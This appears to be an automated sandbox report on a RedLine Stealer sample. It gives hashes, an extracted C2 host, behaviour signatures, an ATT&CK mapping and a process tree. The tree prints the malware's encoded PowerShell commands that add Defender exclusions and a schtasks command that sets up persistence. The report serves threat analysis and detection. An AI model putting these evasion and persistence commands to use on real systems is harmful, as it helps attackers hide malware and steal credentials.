Analysis

  • max time kernel
    130s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    19-11-2021 08:42

General

  • Target

    c23b096fdd5379aeaee9a28e4561143596fe1c7d32555f915a69725c99fba470.exe

  • Size

    1.4MB

  • MD5

    b4ebbc92b9c6aea78e9b797e9365d61b

  • SHA1

    3046ac629e1b298d7af16d0a52d529e165723ae6

  • SHA256

    c23b096fdd5379aeaee9a28e4561143596fe1c7d32555f915a69725c99fba470

  • SHA512

    58bb1d4bf282bbe18c51b13bb7a4a1a23b75c9fa75541f2a202b4c02a4b64f7ce48d5d08f0f07dba9b4a8e3052565bbadf27d60d4a528dfd6971457fcae79a24

Malware Config

Extracted

Family

redline

Botnet

@zhilsholi

C2

nariviqusir.xyz:81

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c23b096fdd5379aeaee9a28e4561143596fe1c7d32555f915a69725c99fba470.exe
    "C:\Users\Admin\AppData\Local\Temp\c23b096fdd5379aeaee9a28e4561143596fe1c7d32555f915a69725c99fba470.exe"
    1⤵
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2752
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:952
      • C:\Users\Admin\AppData\Local\Temp\fl.exe
        "C:\Users\Admin\AppData\Local\Temp\fl.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1728
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3264
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2864
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Local\Temp\Microsoft\services.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2000
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Local\Temp\Microsoft\services.exe"
            5⤵
            • Creates scheduled task(s)
            PID:1976
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\Microsoft\services.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2208
          • C:\Users\Admin\AppData\Local\Temp\Microsoft\services.exe
            C:\Users\Admin\AppData\Local\Temp\Microsoft\services.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2260
            • C:\Windows\system32\cmd.exe
              "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:508
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2520
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1268
            • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:868
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "wkoiucolsmt"
                7⤵
                  PID:1540
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 536
        2⤵
        • Suspicious use of NtCreateProcessExOtherParentProcess
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2224

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Virtualization/Sandbox Evasion

    1
    T1497

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    2
    T1012

    Virtualization/Sandbox Evasion

    1
    T1497

    System Information Discovery

    3
    T1082

    Collection

    Data from Local System

    1
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      ad5cd538ca58cb28ede39c108acb5785

      SHA1

      1ae910026f3dbe90ed025e9e96ead2b5399be877

      SHA256

      c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

      SHA512

      c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      7c540567d0a811924123193b4965b5a7

      SHA1

      e1e3714d9f89f74d7bd5cf820803283831163efb

      SHA256

      107eeab7125978cf5d3df40ad2018f8c3047bd9f02c24a3d58de2dd46a1b6c3e

      SHA512

      a6b781e233ca25a2a368d8ff4e0bb4ad1b34fbd07aa91d9a42f7f47c3a6f4efeb5ac054d6646e2785955a4320959a6e06552eb834513cc80d6d6c143a83f37c9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      408bb1372a2b9604d161d11f04b7dc06

      SHA1

      68b5cbe6dd246739baac2f12d2d762e0f79729ac

      SHA256

      2c139d6a4d7e18f118256f675547f4da998d33291b577de79934a7deb278d3e1

      SHA512

      757c6d0d45d7d3d94f609b92117fb56767d3566559b14ba11836a16133d46c2169de2ddfb23d8f7f382c7acafab9cfc58b70647239caa33ffbddc5970fb26846

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      20f794db4eae9b36d939f270cafc7914

      SHA1

      cbf1c61cbe3b4b69dd319741335f7bc784ae1b1e

      SHA256

      315ba3d4f279a6a195942062718e4cbce1f059b623a7104488699f376cc5df88

      SHA512

      f26a6a0ee756d73806797a56c5301dbe1258adf1dc8ed49fd219699f73e37c0d043fd0c64bbd4819df9581f6cc411fe4ed873e7742111c3a61b121576c0eb721

    • C:\Users\Admin\AppData\Local\Temp\Microsoft\services.exe
      MD5

      ff8b99f5110d71535d12de2a8e4f233b

      SHA1

      2f6976308c3e7ff07f6f9c054fdcecccae952c53

      SHA256

      792ce771992574a19de9c71aa3dc3f2eb1883a866590d734b876159aff119eca

      SHA512

      2fe3440a98f39a7690a6559f9d95a34e4c971a23b431f52380e565ab8b03c172bdc598fe245039732473bc5c5fcce6919c8b1ce21b7d5a5d11a8fb0fcc1c443b

    • C:\Users\Admin\AppData\Local\Temp\Microsoft\services.exe
      MD5

      ff8b99f5110d71535d12de2a8e4f233b

      SHA1

      2f6976308c3e7ff07f6f9c054fdcecccae952c53

      SHA256

      792ce771992574a19de9c71aa3dc3f2eb1883a866590d734b876159aff119eca

      SHA512

      2fe3440a98f39a7690a6559f9d95a34e4c971a23b431f52380e565ab8b03c172bdc598fe245039732473bc5c5fcce6919c8b1ce21b7d5a5d11a8fb0fcc1c443b

    • C:\Users\Admin\AppData\Local\Temp\fl.exe
      MD5

      ff8b99f5110d71535d12de2a8e4f233b

      SHA1

      2f6976308c3e7ff07f6f9c054fdcecccae952c53

      SHA256

      792ce771992574a19de9c71aa3dc3f2eb1883a866590d734b876159aff119eca

      SHA512

      2fe3440a98f39a7690a6559f9d95a34e4c971a23b431f52380e565ab8b03c172bdc598fe245039732473bc5c5fcce6919c8b1ce21b7d5a5d11a8fb0fcc1c443b

    • C:\Users\Admin\AppData\Local\Temp\fl.exe
      MD5

      ff8b99f5110d71535d12de2a8e4f233b

      SHA1

      2f6976308c3e7ff07f6f9c054fdcecccae952c53

      SHA256

      792ce771992574a19de9c71aa3dc3f2eb1883a866590d734b876159aff119eca

      SHA512

      2fe3440a98f39a7690a6559f9d95a34e4c971a23b431f52380e565ab8b03c172bdc598fe245039732473bc5c5fcce6919c8b1ce21b7d5a5d11a8fb0fcc1c443b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
      MD5

      4f54d5ccd5a39d00354753bd4a4aec1c

      SHA1

      4360174c4dd27e25cde39c73725ce8c44de835a9

      SHA256

      e8a351c3b019117e26f3ba9862db37ea5ae4baf03f29b9b1c3a5dabd581e1b04

      SHA512

      e2465b355d035cd6f78d07f4cdcc368a14e55602b6c09c5ae1d91e0fc24e41695e9cadcf3d31f02ba4a31212652f06fc2a0abea0f32d3f01cc686ff46f874216

    • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
      MD5

      4f54d5ccd5a39d00354753bd4a4aec1c

      SHA1

      4360174c4dd27e25cde39c73725ce8c44de835a9

      SHA256

      e8a351c3b019117e26f3ba9862db37ea5ae4baf03f29b9b1c3a5dabd581e1b04

      SHA512

      e2465b355d035cd6f78d07f4cdcc368a14e55602b6c09c5ae1d91e0fc24e41695e9cadcf3d31f02ba4a31212652f06fc2a0abea0f32d3f01cc686ff46f874216

    • memory/508-580-0x0000000000000000-mapping.dmp
    • memory/868-678-0x0000000000000000-mapping.dmp
    • memory/952-200-0x000000000AF10000-0x000000000AF11000-memory.dmp
      Filesize

      4KB

    • memory/952-189-0x000000000A080000-0x000000000A081000-memory.dmp
      Filesize

      4KB

    • memory/952-173-0x0000000000418F0E-mapping.dmp
    • memory/952-174-0x0000000000760000-0x0000000000761000-memory.dmp
      Filesize

      4KB

    • memory/952-175-0x0000000000760000-0x0000000000761000-memory.dmp
      Filesize

      4KB

    • memory/952-201-0x000000000B610000-0x000000000B611000-memory.dmp
      Filesize

      4KB

    • memory/952-168-0x0000000000400000-0x0000000000420000-memory.dmp
      Filesize

      128KB

    • memory/952-195-0x000000000A660000-0x000000000A661000-memory.dmp
      Filesize

      4KB

    • memory/952-192-0x000000000A440000-0x000000000A441000-memory.dmp
      Filesize

      4KB

    • memory/952-191-0x000000000A740000-0x000000000A741000-memory.dmp
      Filesize

      4KB

    • memory/952-190-0x000000000A1A0000-0x000000000A1A1000-memory.dmp
      Filesize

      4KB

    • memory/952-176-0x0000000000760000-0x0000000000761000-memory.dmp
      Filesize

      4KB

    • memory/952-185-0x0000000000760000-0x0000000000761000-memory.dmp
      Filesize

      4KB

    • memory/952-184-0x0000000009000000-0x0000000009001000-memory.dmp
      Filesize

      4KB

    • memory/952-183-0x0000000008FC0000-0x0000000008FC1000-memory.dmp
      Filesize

      4KB

    • memory/952-182-0x0000000008EF0000-0x00000000094F6000-memory.dmp
      Filesize

      6.0MB

    • memory/952-181-0x0000000009090000-0x0000000009091000-memory.dmp
      Filesize

      4KB

    • memory/952-180-0x0000000008F60000-0x0000000008F61000-memory.dmp
      Filesize

      4KB

    • memory/952-179-0x0000000009500000-0x0000000009501000-memory.dmp
      Filesize

      4KB

    • memory/952-177-0x0000000000400000-0x0000000000401000-memory.dmp
      Filesize

      4KB

    • memory/1268-631-0x0000000000000000-mapping.dmp
    • memory/1728-473-0x0000000000000000-mapping.dmp
    • memory/1976-571-0x0000000000000000-mapping.dmp
    • memory/2000-570-0x0000000000000000-mapping.dmp
    • memory/2128-481-0x000000001B7A6000-0x000000001B7A7000-memory.dmp
      Filesize

      4KB

    • memory/2128-465-0x0000000000000000-mapping.dmp
    • memory/2128-480-0x000000001B7A3000-0x000000001B7A5000-memory.dmp
      Filesize

      8KB

    • memory/2128-479-0x000000001B7A0000-0x000000001B7A2000-memory.dmp
      Filesize

      8KB

    • memory/2128-469-0x00000000009F0000-0x0000000000BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/2208-573-0x0000000000000000-mapping.dmp
    • memory/2260-598-0x000000001BD02000-0x000000001BD03000-memory.dmp
      Filesize

      4KB

    • memory/2260-574-0x0000000000000000-mapping.dmp
    • memory/2520-581-0x0000000000000000-mapping.dmp
    • memory/2752-133-0x0000000002780000-0x0000000002781000-memory.dmp
      Filesize

      4KB

    • memory/2752-160-0x0000000002A90000-0x0000000002A91000-memory.dmp
      Filesize

      4KB

    • memory/2752-158-0x0000000002A30000-0x0000000002A31000-memory.dmp
      Filesize

      4KB

    • memory/2752-163-0x0000000002A80000-0x0000000002A81000-memory.dmp
      Filesize

      4KB

    • memory/2752-164-0x00000000027E0000-0x00000000027E1000-memory.dmp
      Filesize

      4KB

    • memory/2752-165-0x0000000002730000-0x0000000002731000-memory.dmp
      Filesize

      4KB

    • memory/2752-166-0x0000000002730000-0x0000000002731000-memory.dmp
      Filesize

      4KB

    • memory/2752-167-0x0000000000400000-0x00000000007C1000-memory.dmp
      Filesize

      3.8MB

    • memory/2752-151-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-150-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-149-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-148-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-146-0x00000000028C0000-0x00000000028C1000-memory.dmp
      Filesize

      4KB

    • memory/2752-147-0x0000000002930000-0x0000000002931000-memory.dmp
      Filesize

      4KB

    • memory/2752-144-0x0000000002910000-0x0000000002911000-memory.dmp
      Filesize

      4KB

    • memory/2752-145-0x00000000028D0000-0x00000000028D1000-memory.dmp
      Filesize

      4KB

    • memory/2752-143-0x00000000028A0000-0x00000000028A1000-memory.dmp
      Filesize

      4KB

    • memory/2752-141-0x00000000028E0000-0x00000000028E1000-memory.dmp
      Filesize

      4KB

    • memory/2752-142-0x00000000028F0000-0x00000000028F1000-memory.dmp
      Filesize

      4KB

    • memory/2752-140-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-139-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-138-0x00000000027D0000-0x00000000027D1000-memory.dmp
      Filesize

      4KB

    • memory/2752-137-0x00000000027B0000-0x00000000027B1000-memory.dmp
      Filesize

      4KB

    • memory/2752-136-0x0000000002760000-0x0000000002761000-memory.dmp
      Filesize

      4KB

    • memory/2752-135-0x0000000002740000-0x0000000002741000-memory.dmp
      Filesize

      4KB

    • memory/2752-134-0x0000000002790000-0x0000000002791000-memory.dmp
      Filesize

      4KB

    • memory/2752-152-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-132-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-131-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-130-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-161-0x0000000002730000-0x0000000002731000-memory.dmp
      Filesize

      4KB

    • memory/2752-162-0x0000000002730000-0x0000000002731000-memory.dmp
      Filesize

      4KB

    • memory/2752-129-0x0000000003670000-0x0000000003671000-memory.dmp
      Filesize

      4KB

    • memory/2752-116-0x0000000000400000-0x00000000007C1000-memory.dmp
      Filesize

      3.8MB

    • memory/2752-159-0x0000000002A20000-0x0000000002A21000-memory.dmp
      Filesize

      4KB

    • memory/2752-157-0x0000000002A70000-0x0000000002A71000-memory.dmp
      Filesize

      4KB

    • memory/2752-115-0x0000000000400000-0x00000000007C1000-memory.dmp
      Filesize

      3.8MB

    • memory/2752-117-0x0000000000400000-0x00000000007C1000-memory.dmp
      Filesize

      3.8MB

    • memory/2752-118-0x00000000025A0000-0x0000000002600000-memory.dmp
      Filesize

      384KB

    • memory/2752-119-0x0000000000400000-0x00000000007C1000-memory.dmp
      Filesize

      3.8MB

    • memory/2752-120-0x0000000002990000-0x0000000002991000-memory.dmp
      Filesize

      4KB

    • memory/2752-128-0x0000000003680000-0x0000000003681000-memory.dmp
      Filesize

      4KB

    • memory/2752-127-0x00000000029B0000-0x00000000029B1000-memory.dmp
      Filesize

      4KB

    • memory/2752-153-0x0000000002730000-0x0000000002731000-memory.dmp
      Filesize

      4KB

    • memory/2752-121-0x00000000029A0000-0x00000000029A1000-memory.dmp
      Filesize

      4KB

    • memory/2752-154-0x0000000002A40000-0x0000000002A41000-memory.dmp
      Filesize

      4KB

    • memory/2752-123-0x00000000029C0000-0x00000000029C1000-memory.dmp
      Filesize

      4KB

    • memory/2752-126-0x00000000029E0000-0x00000000029E1000-memory.dmp
      Filesize

      4KB

    • memory/2752-125-0x0000000002970000-0x0000000002971000-memory.dmp
      Filesize

      4KB

    • memory/2752-124-0x0000000002980000-0x0000000002981000-memory.dmp
      Filesize

      4KB

    • memory/2752-156-0x0000000002A00000-0x0000000002A01000-memory.dmp
      Filesize

      4KB

    • memory/2752-155-0x0000000002A50000-0x0000000002A51000-memory.dmp
      Filesize

      4KB

    • memory/2752-122-0x0000000002950000-0x0000000002951000-memory.dmp
      Filesize

      4KB

    • memory/2864-572-0x000001F1DF4D8000-0x000001F1DF4D9000-memory.dmp
      Filesize

      4KB

    • memory/2864-561-0x000001F1DF4D6000-0x000001F1DF4D8000-memory.dmp
      Filesize

      8KB

    • memory/2864-560-0x000001F1DF4D3000-0x000001F1DF4D5000-memory.dmp
      Filesize

      8KB

    • memory/2864-557-0x000001F1DF4D0000-0x000001F1DF4D2000-memory.dmp
      Filesize

      8KB

    • memory/2864-522-0x0000000000000000-mapping.dmp
    • memory/3264-556-0x0000026FEAFC8000-0x0000026FEAFC9000-memory.dmp
      Filesize

      4KB

    • memory/3264-495-0x0000026FEAFC6000-0x0000026FEAFC8000-memory.dmp
      Filesize

      8KB

    • memory/3264-483-0x0000026FEAFC3000-0x0000026FEAFC5000-memory.dmp
      Filesize

      8KB

    • memory/3264-482-0x0000026FEAFC0000-0x0000026FEAFC2000-memory.dmp
      Filesize

      8KB

    • memory/3264-474-0x0000000000000000-mapping.dmp